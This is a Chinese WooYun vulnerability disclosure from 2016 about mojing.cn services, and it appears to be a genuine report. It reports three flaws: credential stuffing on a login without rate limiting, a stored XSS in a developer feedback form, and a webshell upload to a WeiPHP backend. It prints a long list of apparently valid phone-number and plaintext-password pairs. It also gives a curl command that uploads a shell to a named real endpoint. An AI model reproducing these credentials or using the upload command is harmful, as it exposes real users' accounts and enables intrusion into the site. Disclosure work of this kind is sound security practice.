乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-04: 细节已通知厂商并且等待厂商处理中 2016-05-04: 厂商已经确认,细节仅向厂商公开 2016-05-14: 细节向核心白帽子及相关领域专家公开 2016-05-24: 细节向普通白帽子公开 2016-06-03: 细节向实习白帽子公开 2016-06-18: 细节向公众公开
RT,键盘表哥收到了礼物,我也来一发
首先是撞库,成功撞出了一大堆的账户登录处未做次数以及验证码处理
Payload1 Payload2 Length13846177646 sdhoujie01 88718180093239 wan6290012 88413123276688 ninng183 88213737026362 19770625 87618291957456 zyh262509 87615577110761 Dc19880717 87618633762327 nnd86amc 87413721477762 aini1314 87218576432432 qq6935868 87115659931773 hedaoqin55 86813897463679 w96104216 86818965665560 whf214145 86813555542401 0325511y 86818245301237 z6521426 86813830289123 1116qiyang 86118952455047 19881120 86018020733707 fs0408039 86015651767055 198566 86018641191660 5624110 86013915528614 Lh7758521 86018735376992 lxx4424586 86013336920317 a65476298 86018628278998 yang6638253 86018571471440 ps13388 86015241766922 shishuai21 86013581522846 asdf888 86018883286082 a43630642 86015800295032 a123456 86013676799770 wsczh0418 86013883649807 c83399780 86013429232187 hzj1993523 85515264728945 qq4252426 85413777274896 w8892w63 85218968180726 1714131211 85213846071539 wj584521 85213760341694 6209321 85213770914589 zhang1984 85213819272323 1925852625 85215959025900 ilovebin 85213264228811 77582589a 85218621600258 qcx282 85215030412563 11111a 84815961078309 q8614789 84818977150556 6841698 84518078275817 qq4366456 84415982557785 lixinxing 84418511821121 61428202 84418934311307 liyi801219 84415129190467 watzx1314 84215986989274 xwh5201314 84115292319879 20052134 84015166750959 19970721 84015642877000 760219 84013865041970 zjmzzl123 84015775822345 520wenjie 84013523649911 zhouyuan77 84013736491447 992892323 84018013730125 yinlei520 84013549850518 830614 84013424377369 19840420 84013241814968 zmsx11 84013877336700 ssdy931422 84013600893906 z8356056 84013525127305 www123456 84013728072746 a5362257 84015988438505 lxj620 84018357363092 jy19900820 83918694049554 q543203447 83913099898899 zxcv1234 83913241233214 sn6331907 83813834904042 jj19810427 83813738073127 alex1123 83815250581862 ai198797 83813717788554 197951 83813410105357 a8895578 83815800616740 134679 83813722050101 364762298 83818621704979 weed00 83815629082135 1988927zs 83813658502233 xushaoyuna 83818805727654 yk890102 83815277940262 11121314a 83815073389123 a250275701 83815018514831 swsw000 83818073115125 19841224o 83813784035359 ch820714 83815961765073 a9880630 83813698712331 3434158lyf 83813919791750 1990127ybs 83818621891698 liwei1981 83813378120671 qw27764991 83813223076570 8853qq 83715935229909 19862188a 83613728444422 a2639902 83618626318507 3391929 83515682138005 95ll10 83515030091377 5461628 83513817798135 zsh123 83513828084568 hjj619000 83518377906611 lby199061 83513846467035 wwkfghy520 83515653811505 gao123456 83413872839824 123a123a 83413422898453 7333133 83313874408393 zl810315 833
这些账户都能登录
然后是xss,存在于魔镜开发者平台的反馈处
http://open.mojing.cn/developer/feedback/submit
然后是getshell,这个弄了好久,又学到了新姿势
http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html
这个后台是用weiphp开发的参考这个漏洞
WooYun: weiphp3.0微信开发框架前台getshell第二弹(无需登录)
先在本地弄个shell文件
然后通过以下这个命令将shell上传上去
curl -F '[email protected]' http://weixin.mojing.cn/index.php?s=/Home/File/uploadPicture/
成功上传shell
改改改
危害等级:高
漏洞Rank:20
确认时间:2016-05-04 15:38
感谢您提交的漏洞,我们会尽快修复。
暂无